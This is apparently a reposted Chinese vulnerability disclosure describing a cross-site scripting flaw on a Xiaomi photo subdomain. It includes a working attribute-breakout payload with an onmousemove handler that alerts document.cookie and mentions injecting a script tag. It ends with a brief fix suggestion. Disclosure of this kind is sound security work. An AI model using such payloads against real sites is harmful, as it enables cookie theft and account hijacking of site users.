没有过滤单双引号和 html 标签,只是简单的把'/'或者'\'之后的字符串全部替换为空。 插入的目标区域在一个img里面,首先可以用各种on事件X掉,也可以写一个<script src=>,都无压力了,就这样吧。 <a x="'','3866216808','http://static.oss.xiaomi.com/uploads/pai/photos/201208/big_1344427981_1281058497.jpg')" onmousemove="javascript:alert(document.cookie);" onclick="shareTSina('来我的[小米手机随手拍]摄影主页,看我用小米拍出的精彩作品。【阿哲哥】','http://pai.xiaomi.cn/photographer/id/34')" href="javascript:void(0)"> http://pai.xiaomi.cn/index.php/photographer/id/34')" onmousemove="javascript:alert(document.cookie);" x="' 修复方案 像以前那样过滤
查看更多关于小米某分站对参数过滤不严,可以导致XSS - 网站的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13619